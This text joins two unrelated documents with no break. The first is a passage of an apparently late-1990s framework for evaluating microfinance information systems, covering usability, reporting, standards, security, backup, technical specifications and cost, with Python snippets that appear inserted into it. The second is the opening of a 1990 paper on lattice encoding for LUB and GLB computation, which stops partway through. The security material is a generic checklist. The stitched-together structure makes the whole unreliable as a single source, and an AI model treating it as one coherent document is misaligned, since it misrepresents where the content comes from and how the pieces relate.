maintenance of value accounts and other inflationary risk mitigation functions</td> <td></td> </tr> </tbody> </table> CHAPTER FOUR CATEGORY 2: USABILITY Description: Measures the degree to which the user interface of the software helps users to perform their tasks effectively and efficiently, with little or no chance of errors. Includes the availability and usefulness of user documentation, screen layouts and navigational aids, on-line help, and prompts. Evaluation would consist of a checklist of key aspects concerning the user interface and a qualitative assessment of the ease of use. One of the best ways of determining the usability and user satisfaction of any software product is a user survey. Therefore, a user survey should be performed to determine how different users rate the software. A user survey is an essential tool that should be used to elicit the answers to the following questions: - Who is the user? (i.e., job title, responsibilities, age, education and training, how long and how often they have interacted with the system, etc.) - How does the software help the users do their work? - What do users like about the system? Why? - Do users think the software is easy to use? Why or why not? - What do users dislike about the system? Why? - What else could the system do to improve overall efficiency and job satisfaction? - Overall rating of the system by users Topics: Ease of Use and User-Friendliness; User Interface <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | **Ease of Use and User-Friendliness** | Ability of the user to perform needed tasks easily and efficiently without errors. A major factor when implementing a new information system is how easily both the user community and the administrative personnel can learn and understand the system.
The ease of use of a system will determine many things, including the training needs of the organization, the number of user mistakes, and how much the user will like using the system. | ▪ Amount of training required for users; who provides it? Where and how do people get trained? Is it convenient or disruptive to operations? ▪ Quality of user documentation ▪ Usefulness of on-line help (detail, ability to drill down through topics, hyperlinks, etc.) ▪ Straightforwardness of operations ▪ Easy error correction ▪ Program does not bomb out or crash when the user does something unexpected ▪ Prompts or guides user to correct actions | | | **User Interface** | For the most part, ease of use can be determined through the user interface. The user interface consists of the screens and forms through which users interact with the system. | ▪ Graphical vs. text-based user interface (e.g., Windows vs. DOS) ▪ Physical appearance, layout, and logic of screens and menus ▪ Screens flow logically and consistently ▪ Appropriate information displayed for each level or type of user ▪ Provides a mechanism for mass data entry ▪ Consistent language and verbiage throughout ▪ Error messages in “user-ese” not “tech speak” ▪ Consistent and logical use of color to assist user where possible ▪ Keyboard and mouse access to all major functions ▪ Follows general platform standards (Microsoft for PCs, etc.) | | CHAPTER FIVE CATEGORY 3: REPORTING Description: Examines the extent to which built-in reports cover management and operations requirements, the accuracy of the information presented, and the visual effectiveness of the reports. Examines whether users can modify existing reports or create new reports on their own. Investigates whether the system allows institutions to export data to spreadsheets for further manipulation or whether the data must be re-entered by hand.
Evaluation would compare the list of available reports and report customization facilities against a standardized list of required reports, and include a qualitative assessment of the visual layout and effectiveness of the reports. Topics: Reports; Report Generation <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Reports | Adequacy and accuracy of the standard reports produced by the system. Includes how usable the different reports are. | General: - CGAP suggested reports - Micro-Banking Bulletin standard reports and report formats - Consolidated, as well as separated, reporting capabilities - User modifiable report formats - Reports according to audience (manager, operations, supervisory, etc.) - Report formats are clear and readable - Budget vs. actual reporting is possible Management reports: - Key statistical summaries - Cash-flow projections - Branch office and loan officer performance Operational reports: - Daily listings - Daily delinquency reports - Portfolio quality reports Financial reports: - Trial balance - Daily sub-ledger reports - Daily transaction reports - Monthly, quarterly, and annual financial statements - Ratios and trends - Clear, correct calculations of ratios and indicators - Audit trail - Accounts for inflation and subsidy adjustments | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Report Generation | The mechanism through which reports are created. Does the system provide standard ("canned") reports and does it allow the user to generate additional reports without requiring assistance from the software vendor? | Customer reports: - Statements - Balances - Queries - Batch report generation - Ad-hoc report generation - Canned reports - User-defined reports - Report generation tool (Crystal Reports, etc.)
- Report information can be dumped into a file readable by standard word processing or spreadsheet software - Printer and paper size requirements - Reports are generated frequently and are useful to intended audience | | CHAPTER SIX CATEGORY 4: STANDARDS AND COMPLIANCE Description: Studies the extent to which the software product adheres to industry, government, and supervisory standards and regulations. Any system providing accounting support should be assessed to determine whether the system is in accordance with Generally Accepted Accounting Principles (GAAP) and International Accounting Standards (IAS). In addition, every system should meet the regulations set by local, regional, and national supervisory organizations. As the microfinance industry grows and becomes increasingly commercialized, adherence to regulatory mandates will become increasingly important. Topics: Accounting Soundness and Standards; Governmental and Supervisory Adherence <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Accounting Soundness and Standards | This topic asks whether the accounting portion of the software product meets generally held standards and processes accounts in a sound and consistent way. | ▪ Accounting package can be modified to meet local legal requirements ▪ Adheres to GAAP and/or IAS provisions ▪ Adheres to French accounting principles (where appropriate) ▪ On-line or batch ledger updates ▪ Posting order for partial or late payments ▪ Categorizing current vs. delinquent loans ▪ Accrual vs. cash ▪ Existence of accounts to handle interest and principal due but not received separate from “accrued” ▪ Software ceases to accrue interest on late loans ▪ When savings interest is accrued, posted, and compounded | | | Governmental and Supervisory Adherence | The activities of many microfinance institutions are under the purview of governmental and supervisory regulators.
Whether a software package meets these requirements and regulations is the focus of this topic. | ▪ Meets government/supervisory regulations ▪ System can be easily modified to meet changes or additions to regulatory body requirements ▪ Supports reporting requirements of central bank ▪ Integrated into the national payment system | | CHAPTER SEVEN CATEGORY 5: ADMINISTRATION AND SUPPORT Description: A broad range of activities and features are covered by this category. For example, to assess this category accurately, the software provider’s ability to provide support and maintenance to the organization should be determined. Support includes installation, conversion, error correction, user queries, and periodic software improvements. Points to be covered would include years in business, number of staff, location of support offices, number of installed systems, existence of system documentation and operations manuals, and training materials and plans. The category also covers security, which refers to provisions in the software to prevent or detect unauthorized entry, accidental or intentional damage to data, and falsification of records. Other factors to be assessed are the ability of the software to recover accurately from crashes (power outages and others); provisions within the software to ensure the reliability, validity, and safety of the data; and mechanisms for accurately backing up and restoring data. The evaluation would also entail making a checklist of key recovery and backup features and assessing the accuracy and performance of these features. Lastly, this category examines the ability of the vendor or internal staff to provide initial and ongoing support to the software, including the ability of the software provider to provide support and maintenance. Such support includes installation, data conversion, error correction, user queries, and periodic software improvements.
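The security criteria in this category include tiered user access, restricting users to specific activities, and an audit trail that identifies the user. A minimal sketch of how such tiered access checks and audit lines might be wired together follows; the role names, permission sets, and function names are illustrative assumptions, not part of the framework.

```python
# Minimal sketch of tiered user access with an audit-trail line.
# Roles and permission sets below are made-up examples.
ROLE_PERMISSIONS = {
    "teller": {"post_payment", "view_client"},
    "loan_officer": {"post_payment", "view_client", "create_loan"},
    "branch_manager": {"post_payment", "view_client", "create_loan",
                       "approve_loan", "run_reports"},
}

def is_allowed(role: str, action: str) -> bool:
    """Return True if the given role may perform the action."""
    return action in ROLE_PERMISSIONS.get(role, set())

def audit_entry(user: str, role: str, action: str) -> str:
    """Build an audit-trail line that identifies the user, as the criteria require."""
    status = "OK" if is_allowed(role, action) else "DENIED"
    return f"{user} ({role}) -> {action}: {status}"
```

An evaluator could use such a model to check whether the package under review enforces comparable separations (e.g., whether a teller can be prevented from approving loans).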
Topics: Security; Backup and Recovery; Fault Tolerance and Robustness; End-of-Period Processing; Support Infrastructure and Maintenance; Version Control and Upgrade Strategy <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Security | Built-in safeguards of the system to prevent illegal or accidental alteration of the data files. | Look for presence of major security procedures: - Different levels of user access with functions reserved for specific user levels (integrated into the user interface) - Supports different user views based on user permissions and types - User passwords - Does the system prompt users to change their passwords on a regular basis? - Users restricted to specific activities - Inherent security of the database and system architecture, protecting the system from both direct attacks and “back door” entry, the isolation of the database, and proper firewalls - Encryption of the database and passwords - Notification of file violations - Audit trail on transactions that identifies user - System violation log - Time-of-day or terminal access restrictions - Self-auditing program - Off-site data storage of records | | | | Backup and Recovery| Provisions to store completed transactions, balances, and statements safely, and to restore this information if necessary. Ability of the software to accurately recover from an accidental or improper shutdown. | - Automatic end-of-day processing, with built-in recovery mechanisms - Length of time required for backup - Full vs. 
incremental backups - Does the system provide for (or require) full backups on a regular basis—such as weekly or monthly - When restarting the system, correctly completes or restarts transactions or activities to avoid duplication of entries or lost data - How difficult and time-consuming the recovery process is - System keeps track of current status and activity for both the central processing and each user - Does the system have archival facilities for off-loading old, unused data (to keep the database from growing exponentially) | | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | **Fault Tolerance and Robustness** | Ability of the system to either recover after a crash (either software or externally induced) or remain online during such an incident. Since information is the primary resource for managing any financial organization, it is imperative that the software maintains the integrity of the data. | ▪ For a networked system, the system remains online if the network goes down ▪ Notification to user of transactions not completed ▪ System continues to function properly despite database or operating system errors ▪ System handles major errors “gracefully” by providing users adequate time and information to react correctly | | | **End-of-Period Processing** | Most systems require some sort of administrative intervention to perform end-of-period processing such as interest calculation on deposits and reporting. This topic covers how well the system handles the different end-of-period procedures.
| ▪ Proper interest posting and compounding ▪ Late fees and penalties are calculated correctly ▪ System correctly “closes the books” and prepares for end of period reporting ▪ Transactions are moved from the journal to the general ledger ▪ Report generation cycle is kicked off | | | | | Period duration: ▪ Daily ▪ Weekly ▪ Monthly ▪ Quarterly ▪ Yearly ▪ Other (user-definable) | | | **Support Infrastructure and Maintenance** | This topic describes a wide range of issues related to how well the system in question is supported either by internal or external resources. | Off the shelf: ▪ Years in business ▪ Financial strength of vendor ▪ Number, size, and length of installed systems ▪ Location of nearest support office ▪ Response times/response levels ▪ Support hotline ▪ Number and technical ability of support staff ▪ Access to source code (where appropriate or necessary) ▪ Support of code once changed by the institution ▪ Upgrade support and timeline (regional support offices) | | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td>• Change request procedure</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Support capabilities (installation, data conversion, customization, training, day-to-day technical support)</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• System manuals and training materials</td> <td></td> </tr> <tr> <td></td> <td></td> <td>Homegrown information system staff:</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Response time</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Internal help desk</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Support hotline</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Technical ability of support staff (number and experience)</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Change request procedure</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• Support capabilities (installation, 
data conversion, customization, training, day-to-day technical support)</td> <td></td> </tr> <tr> <td></td> <td></td> <td>• System manuals and training materials</td> <td></td> </tr> </tbody> </table> **Version Control and Upgrade Strategy** Version control is how a software developer bundles and packages functionality into a product. To do this bundling properly, the developer needs to manage the program files (code, etc.) in a coherent and controlled way. Good version control alleviates the problems of having different copies of the software running simultaneously. Usually versions are numbered in the format 1.0, 1.1, 1.1.1, 2.0, etc. New versions usually translate into upgrades to the different users of the software product. Since upgrades sometimes involve major changes to the program, it is important for the software developer to have a clear plan for implementing these updates. This plan is called an upgrade strategy. | | | • Source code maintenance | | | | | • Clear versioning of software (developer can tell immediately what versions of the software are currently in production and what functionality is supported by each version) | | | | | • Clear upgrade strategy (developer can explain how to move from one version to another and what effort such an update will require) | | | | | Rollout mechanisms used: | | | | | • “Big Bang”—completely stop the current (old) system and start new system at the same time (dangerous and not recommended but commonly attempted) | | | | | • Parallel—continue to run the current system and the new systems simultaneously for a certain period of time, in order to check the accuracy and performance of the new system | | CHAPTER EIGHT CATEGORY 6: TECHNICAL SPECIFICATIONS AND CORRECTNESS Description: Analyzes the programs and programming language of the software, the type of network and hardware it is designed to work on, and the implications of these for future performance.
In addition, the overall performance of the system in terms of speed and storage requirements should be assessed. It should also be determined how well the system handles large numbers (typically, currency amounts) and dates (i.e., the year 2000). Topics: Technology and Architecture; Performance; Number and Date Handling <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Technology and Architecture | When analyzing computerized systems, an important facet is the technological platform upon which they are implemented. The platform consists of a set of technologies put together in a systematic or architectural way. This topic refers to the type of hardware and software used to create, execute, and maintain the system. The infrastructure and environment of the organization should drive technology and the technical architecture, both now and in the future. | Have the following system areas been appropriately applied to the local technical environment: - Architecture (networked vs. stand-alone; client/server; etc.) - Database (dBase, Oracle, Paradox, etc.) - Hardware (PC, Macintosh, Unix, etc.) - Minimum hardware configuration - Operating system (DOS, Windows 3.x, Windows 95, Windows NT, UNIX, Macintosh) - Network (Novell, Banyan, TCP/IP, etc.) - Development methodology (none, traditional, object-oriented, etc.) - Programming language (Clipper, FoxPro, Delphi, COBOL, C/C++, Java, etc.) - Infrastructure (electricity, telephone, etc.) - Source code control (none, PVCS, SourceSafe, etc.) - Client/member-centric vs. loan/product-centric | | | Performance | This topic determines how fast the software system executes any given task and how efficiently it stores and maintains its data. Whenever possible use a standard hardware configuration to test the system (not just for performance). Suggested configuration is: Pentium 133 or better and 16 megabytes of RAM or more.
| Speed: - User interface (how fast is client data displayed, how quickly are long lists shown to the screen, etc.) - Report generation (how fast are weekly, daily, and yearly reports generated) - Multiple users (does the system slow down with more than one user, at what point does speed start to degrade, etc.) - Significant performance degradation as the size of the database grows Storage: - Empty system (how much data space does the software require after initial installation, i.e., before entry of any client data?) - Client data (how much space is required per client?) - Product data (how much space is required per product?) | | <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> </table> | Number and Date Handling | This topic refers to all number or date related problems, of which the best known is the Year 2000 problem. Additional problems include the ability to handle large numbers (for inflated currencies) and year problems (1999, 2000, and 2001). | ▪ Year 1999, 2000, 2001 ▪ Large numbers (>16 digits) | | | CHAPTER NINE CATEGORY 7: COST Description: Considers all costs associated with purchasing, installing, and operating the system. Cost information should include the base price of the software (as well as an assessment of the pricing structure), maintenance agreements, installation and training, conversion, upgrades, and maintenance releases.
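The large-number criterion above (amounts beyond 16 digits, common with highly inflated currencies) is exactly where binary floating point silently loses cents. A minimal sketch of the problem and one standard remedy, Python's `decimal` module, follows; the balance and rate shown are made-up illustrative values.

```python
from decimal import Decimal, getcontext

# A float keeps only ~15-16 significant decimal digits, so a large
# currency amount loses its cents silently:
balance_float = 12345678901234567.89  # not representable exactly as a float

# Decimal arithmetic keeps exact digits up to the configured precision.
getcontext().prec = 28  # default is already 28; set explicitly for clarity
balance_exact = Decimal("12345678901234567.89")

# Applying an (illustrative) 1.5% rate stays exact in Decimal.
interest = balance_exact * Decimal("0.015")
```

An evaluator can use a probe like this against the system under review: enter an amount with more than 16 digits, apply an interest posting, and check whether the last digits survive.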
Topics: Pricing and Costs <table> <thead> <tr> <th>Topic</th> <th>Definition</th> <th>Measurement Criteria</th> <th>Rating/Comments</th> </tr> </thead> <tbody> <tr> <td>Pricing and Costs</td> <td>A consideration of all costs associated with purchasing, installing, modifying, updating, and operating the system.</td> <td>- Base price and pricing structure (licensing policies, etc.)&lt;br&gt;- Customization and/or development costs&lt;br&gt;- Additional costs for computer and network hardware&lt;br&gt;- Additional costs for source code (where appropriate)&lt;br&gt;- Maintenance and technical support fees and charges&lt;br&gt;- Administrative costs (internal support)&lt;br&gt;- Installation and training costs&lt;br&gt;- Documentation costs&lt;br&gt;- Conversion costs (moving from an old to a new system)&lt;br&gt;- Costs of future upgrades and new releases&lt;br&gt;- Overall costs per user and costs per information system staff&lt;br&gt;- Price appropriate to level/complexity of functionality&lt;br&gt;- Overall value proposition (functionality as a function of cost)</td> <td></td> </tr> </tbody> </table> ANNEX A RATING SCORE SHEET ## Functionality and Expandability <table> <thead> <tr> <th>Weight</th> <th>Rating</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> </tr> </tbody> </table> - Functional completeness, appropriateness, and integration - Accounting package - Portfolio tracking - Deposit monitoring - Customer information system - Expandability and institutional growth - Flexibility - Customer-centric vs. 
account-centric - Institutional types - Lending methodologies - Loan interest types - Savings and deposit account types - Deposit interest types - Payment types - Payment frequencies - Multiple branches or regions - Multiple languages - Multiple currencies ## Usability - Ease of use and user-friendliness - User interface ## Reporting - Reports - Report generation ## Standards and Compliance - Accounting soundness and standards - Governmental and supervisory adherence ## Administration and Support - Security - Backup and recovery - Fault tolerance and robustness - End-of-period processing - Support infrastructure and maintenance - Version control and upgrade strategy ## Technical Specifications and Correctness - Technology and architecture - Performance - Number and date handling ## Cost - Pricing and costs
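Annex A's score sheet pairs each category and topic with a Weight and a Rating column, which implies a weighted aggregate score per category. A minimal sketch of that aggregation follows; the framework leaves both weights and ratings to the evaluator, so the numbers below are placeholder assumptions.

```python
def weighted_score(entries):
    """Combine {topic: (weight, rating)} into a weighted average rating.

    Weights need not sum to 1; they are normalized by their total.
    """
    total_weight = sum(w for w, _ in entries.values())
    if total_weight == 0:
        raise ValueError("weights must not all be zero")
    return sum(w * r for w, r in entries.values()) / total_weight

# Placeholder weights and ratings for the Usability category.
usability = {
    "Ease of use and user-friendliness": (2, 4.0),
    "User interface": (1, 3.0),
}
```

Category scores computed this way can then be weighted again against each other to produce an overall rating for each candidate system.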
# A Space and Time Efficient Coding Algorithm for Lattice Computations

Deb Dutta Ganguly and Sanjay Ranka
School of Computer and Information Science, Syracuse University
Suite 4-116, Center for Science and Technology, Syracuse, NY 13244-4100
ranka@top.cis.syr.edu, (315) 443-4457

October 30, 1990

**Abstract.** This paper presents an encoding algorithm to enable fast computation of the least upper bound (LUB) and greatest lower bound (GLB) of a partially ordered set. The algorithm presented reduces the LUB computation to an OR operation on the codes; the GLB computation is reduced essentially to an AND operation on the codes. The time complexity of our encoding algorithm is $O(n + e)$, where $n$ is the number of nodes and $e$ is the number of edges. With respect to space requirements the algorithm gives good results for small lattices (the code length was 50 bits for a 300-node lattice), but it gives truly remarkable results for larger lattices (e.g., for a 950-node lattice it used 110 bits).

**Keywords and Phrases.** class inheritance, GLB, LUB, lattice, poset.

**List of Figures**

- Figure 1: A lattice
- Figure 2: Adjacency Matrix
- Figure 3: Transitive Closure Matrix
- Figure 4: Codes after Pass 1
- Figure 5: Codes after Pass 2
- Figure 6: Codes after Pass 1
- Figure 7: Codes after Pass 2
- Figure 8: Algorithm Encode
- Figure 9: Pass 1
- Figure 10: procedure name_children
- Figure 11: procedure max_pure_siblings
- Figure 12: procedure compute_prefix_len
- Figure 13: Pass 2
- Figure 14: procedure glb_info
- Figure 15: Number of nodes vs. Avg. code length
- Figure 16: Number of nodes vs. Avg. computation time

## 1 Introduction

Lattice operations are used to determine object properties by conjunction, disjunction, or exclusion of certain class properties. In [1] Hassan Aït-Kaci et al. discuss the applications of lattice computations in languages that support (multiple) inheritance in partially ordered classes. [2] presents an overview of the research in partially ordered data types: semantic networks, the first-order approach, the initial algebra approach and the denotational approach.

Kifer and Subrahmanian [3] have developed a theoretical foundation for multivalued logic programming. They present a procedure for processing queries to such programs and show that if certain constraints (over lattices) associated with such queries are solvable, then their proof procedure is effectively implementable. Thus, an engine for solving such constraints over lattices is critical to the practical implementation of the generalized annotated logic programming of [3]. An important contribution of the Kifer-Subrahmanian work is that they show that their generalized annotated logic programming formalism is applicable to various important issues relating to expert systems. In particular, uncertainty of various different kinds (e.g., bilattices, Bayesian uncertainty propagation) can be handled in their framework. Additionally, their framework can be used to reason about databases that contain inconsistencies. As inconsistencies can easily arise in knowledge-based systems (due either to errors in the data, or due to genuine differences of opinion amongst multiple experts), it is vital that databases behave well in the presence of such inconsistencies. Furthermore, Kifer and Subrahmanian [3] demonstrate that their framework can also be used for temporal reasoning. However, the query processing procedure developed by them lacks an important component, viz. their procedure is completely contingent upon certain constraints being solvable.
However, no such procedures are developed by Kifer and Subrahmanian [3]. We address this problem in this paper. The solution to this problem presented here would make the Kifer-Subrahmanian procedure for processing queries implementable.

We first define a few basic notions [4].

**Definition 1:** A binary relation $\leq$ on a set $P$ is called a partial ordering in $P$ iff $\leq$ is reflexive, antisymmetric and transitive. The ordered pair $\langle P, \leq \rangle$ is called a partially ordered set or a poset.

**Definition 2:** Let $\langle P, \leq \rangle$ be a partially ordered set and let $A \subseteq P$. Any element $x \in P$ is an upper bound for $A$ if for all $a \in A$, $a \leq x$. Similarly, any element $x \in P$ is a lower bound on $A$ if for all $a \in A$, $x \leq a$.

**Definition 3:** Let $\langle P, \leq \rangle$ be a partially ordered set and let $A \subseteq P$. An element $x \in P$ is a least upper bound for $A$ if $x$ is an upper bound for $A$ and $x \leq y$ for every upper bound $y$ for $A$. Similarly, the greatest lower bound for $A$ is an element $x \in P$ such that $x$ is a lower bound and $y \leq x$ for all lower bounds $y$. A least upper bound, if it exists, is unique, and the same is true for a greatest lower bound. The least upper bound is abbreviated as "LUB" and the greatest lower bound as "GLB".

**Definition 4:** A lattice is a partially ordered set $\langle L, \leq \rangle$ in which every pair of elements $a, b \in L$ has a greatest lower bound and a least upper bound.

Lattices can be encoded by a brute-force approach using transitive closure (Section 2), such that the AND operation on two codes gives the LUB. This method uses $n$ bits to encode each node of a lattice with $n$ nodes; the total amount of space required is thus $O(n^2)$. This may be prohibitive for large lattices. [1] presents an algorithm which uses "modulation" to reduce the code-length.
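Definitions 1-4 can be made concrete with a naive LUB computation on a tiny, hypothetical poset (the node names, the `parents` relation and the `layer` numbering below are invented for illustration; they are not from this paper):

```python
def ancestors(node, parents):
    """The upper set of `node`: the node itself plus everything reachable
    by repeatedly moving to a parent."""
    seen, stack = set(), [node]
    while stack:
        cur = stack.pop()
        if cur not in seen:
            seen.add(cur)
            stack.extend(parents.get(cur, []))
    return seen

def lub(a, b, parents, layer):
    """Least upper bound: the common upper bound on the lowest layer."""
    common = ancestors(a, parents) & ancestors(b, parents)
    return min(common, key=lambda n: layer[n])

# child -> immediate parents (edges point upward); a tiny made-up lattice
parents = {"a": ["f"], "b": ["f"], "c": ["g"], "f": ["top"], "g": ["top"]}
layer = {"a": 0, "b": 0, "c": 0, "f": 1, "g": 1, "top": 2}

print(lub("a", "b", parents, layer))   # a and b share the upper bounds f and top
```

This brute-force search is what the encodings developed below replace with a handful of bit operations.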
Our algorithm is simpler and has $O(n + e)$ time complexity. The LUB computations can still be completed by OR operations. The GLB computation is reduced to an AND operation on the codes followed by a simple step. The algorithm gives good results for small lattices (the average code length was 50 for a 300-node lattice), but it gives truly remarkable results for larger lattices (e.g., for a 950-node lattice it used 110 bits for encoding).

Section 3 describes a simple version of the algorithm when applied to a tree. Section 4 discusses the changes necessary to apply the same basic paradigm to poset encoding. Section 5 describes the algorithm and Section 6 proves its correctness. Section 7 discusses the implementation. Section 8 concludes the paper.

## 2 Transitive Closure

In this section we discuss the transitive closure technique for encoding lattices. Consider the lattice in Figure 1; its adjacency matrix $A$ is shown in Figure 2. The edges are directed downwards. The adjacency matrix has a '1' in the row headed by $x$ under the column headed by $y$ iff there is an edge from $x$ to $y$ in the lattice; otherwise a position in the adjacency matrix has a '0'. A row headed by $x$ is a representation of the set of all the immediate lower bounds of $x$. Similarly, a column headed by $y$ can be viewed as a representation of the set of all the immediate upper bounds of $y$. Since we are interested in the LUB here, we will take the latter view.

Next the transitive closure $A^*$ of $A$ is calculated by matrix multiplication. This is given by:

$$A^* = \bigcup_{i=0}^{n} A^i$$

This computation converges in $O(\log_2 n)$ matrix multiplications of $n \times n$ boolean matrices. First $A^1 = I \cup A$ is calculated, from this $A^2$, and so on until two consecutive matrices are the same. $A^*$ is shown in Figure 3. Clearly the 1's in the column headed by $y$ indicate the upper bounds of $y$. Now an AND operation on two columns will yield the set of the common upper bounds.
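The closure-and-AND scheme can be sketched as follows. For brevity the closure is computed with Warshall's algorithm rather than repeated matrix multiplication, and the five-node lattice is hypothetical (Figure 1 is not reproduced in this text):

```python
def closure(adj):
    """Reflexive-transitive closure of a boolean adjacency matrix
    (Warshall's algorithm stands in for the repeated multiplications)."""
    n = len(adj)
    c = [row[:] for row in adj]
    for i in range(n):
        c[i][i] = 1                        # the A^0 = I term
    for k in range(n):
        for i in range(n):
            for j in range(n):
                c[i][j] |= c[i][k] & c[k][j]
    return c

# Hypothetical 5-node lattice; edges are directed downwards.
names = ["top", "f", "g", "a", "b"]
idx = {name: i for i, name in enumerate(names)}
adj = [[0] * len(names) for _ in names]
for u, v in [("top", "f"), ("top", "g"), ("f", "a"), ("f", "b"), ("g", "b")]:
    adj[idx[u]][idx[v]] = 1

c = closure(adj)

def column(node):
    """A node's code: its column in A*, i.e. the set of its upper bounds."""
    return [c[i][idx[node]] for i in range(len(names))]

# AND of two columns = the set of common upper bounds
common = [x & y for x, y in zip(column("a"), column("b"))]
print([name for name, bit in zip(names, common) if bit])
```

Each column is one node's $n$-bit code, which is exactly why this method needs $O(n^2)$ bits in total.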
For example, the AND of the columns under 'b' and 'c' gives $[00000101]^T$, which is the code under the column headed by node 'f', the common upper bound and the LUB. Note that in a general poset (unlike a lattice) two nodes may have more than one minimal upper bound; in that case the AND of the codes will yield a code which represents the set of all common upper bounds. This method uses $n$ bits to encode each node of a lattice with $n$ nodes; the total amount of space required is thus $O(n^2)$ bits. This may be prohibitively high for large lattices.

## 3 Tree Encoding

In this section we will discuss a coding algorithm for a tree which forms the basis of our lattice encoding algorithm. The algorithm works in two passes. In Pass 1, the lattice is swept layer$^1$ by layer from layer 0, the bottommost layer of minimal elements, to the topmost layer of maximal elements. At each layer the nodes are encoded such that sibling nodes get distinct codes. In Pass 2, the lattice is swept from top to bottom. Now the non-sibling nodes are distinguished by prefixing them with their respective parents' codes. The bitwise OR of any two codes yields the code of the LUB.

$^1$The word "layer" has been used for trees here (as opposed to the usual "level") and for lattices in subsequent sections to maintain consistency.

In Pass 1, if there are $n$ nodes with a common parent then an $n$-bit code of the form $2^i$, $0 \leq i \leq n - 1$, is used, i.e., a '1' at the $i$th position and '0's at all other positions. Thus, at layer 0 the children of the same parent are assigned distinct codes. Then, at every subsequent layer, for each node such a code is prefixed to the bitwise OR of the children's codes. For instance, the bitwise OR of node a's code (01) and node b's code (10) is 11, to which 01 is prefixed, yielding node i's code (0111) in the leftmost subtree in Figure 4. The prefixing ensures that we can distinguish the codes of siblings.
In Pass 1 the nodes with the same parent are assigned distinct codes, but nodes with different parents may still have identical codes. Pass 2 makes them distinct. Figure 4 illustrates the result of applying Pass 1 to the binary tree shown.

Pass 2 starts at layer $n-2$, where layer $n$ is the topmost (maximal) layer. It prefixes the existing codes to yield the final codes. Let $d = \text{length(parent.code)} - \text{length(current.code)}$. Each code is prefixed by the leftmost $d$ bits of its parent, thus yielding the codes in Figure 5.

**Example:** Consider the nodes a and d in Figure 5. The bitwise OR of their codes is 011111, which is the code of m, the LUB of nodes a and d. Our encoding algorithm ensures that the LUB of two nodes has a '1' at all the positions at which the bitwise OR of the codes of the two nodes has a 1, and possibly a few more. Now consider the nodes a and b in Figure 5. The bitwise OR of their codes is 011101. Nodes i, m, o subsume this code; of these, node i is at the lowest layer, hence it is the LUB.

### 3.1 Analysis of Tree Encoding

For a tree with a constant branching factor $b$ the above algorithm will use $b$ bits at each layer. If the tree has $l$ layers then $b \times l$ bits would be required for encoding each node of the tree. Thus when $b = 2$ each node uses $2 \times l$ bits. If the tree has $n$ nodes then, in terms of $n$, only $2 \times \log_2 n$ bits are used per node. The entire tree would use $2n \times \log_2 n$ bits, compared to the $n^2$ bits used by the Transitive Closure method.

Figure 4: Codes after Pass 1
Figure 5: Codes after Pass 2

The algorithm works well for a tree, but cannot be directly used on a lattice. The main difference between a lattice and a tree, in the context of this algorithm, is that every node in a tree has an indegree$^2$ of one (pure nodes), whereas in a lattice some nodes can have an indegree greater than one (impure nodes).
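The two passes of the tree encoding can be sketched on a small, hypothetical complete binary tree (the paper's eight-leaf example of Figures 4-5 is not reproduced here). Codes are kept as bit strings so that "prefixing" is literal left-concatenation, and the LUB lookup picks the lowest-layer node whose code subsumes the OR, as in the example above:

```python
children = {"m": ["i", "j"], "i": ["a", "b"], "j": ["c", "d"]}
layer = {"a": 0, "b": 0, "c": 0, "d": 0, "i": 1, "j": 1, "m": 2}
code = {}

def pass1(node):
    """Bottom-up. Returns the node's code before its own sibling prefix is
    attached (that prefix is attached by the node's parent)."""
    kids = children.get(node, [])
    if not kids:
        return ""                          # leaves start with the empty code
    partial = [pass1(k) for k in kids]
    for i, k in enumerate(kids):           # distinct one-hot sibling prefixes
        code[k] = format(1 << i, "0%db" % len(kids)) + partial[i]
    width = len(code[kids[0]])
    return "".join("1" if any(code[k][j] == "1" for k in kids) else "0"
                   for j in range(width))  # bitwise OR of the children codes

def pass2(node):
    """Top-down: prefix each child with the leftmost d bits of its parent."""
    for k in children.get(node, []):
        d = len(code[node]) - len(code[k])
        code[k] = code[node][:d] + code[k]
        pass2(k)

code["m"] = pass1("m")
pass2("m")

def lub(x, y):
    target = "".join("1" if "1" in ab else "0" for ab in zip(code[x], code[y]))
    subsumers = [n for n in code
                 if all(t == "0" or c == "1" for c, t in zip(code[n], target))]
    return min(subsumers, key=lambda n: layer[n])
```

With this tree, `code["i"]` comes out as `"0111"`, matching the worked example of node i above, and `lub("a", "b")` returns `"i"`.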
This necessitates a few modifications to the above algorithm. We discuss the basic modification in the next section.

## 4 Lattice Encoding

In this section we discuss the basic modification required for applying the above paradigm to a lattice. We observed that the problem arises because of the impure nodes. To overcome this problem we assign distinct prefixes to the impure nodes in Pass 1 which are not used again.

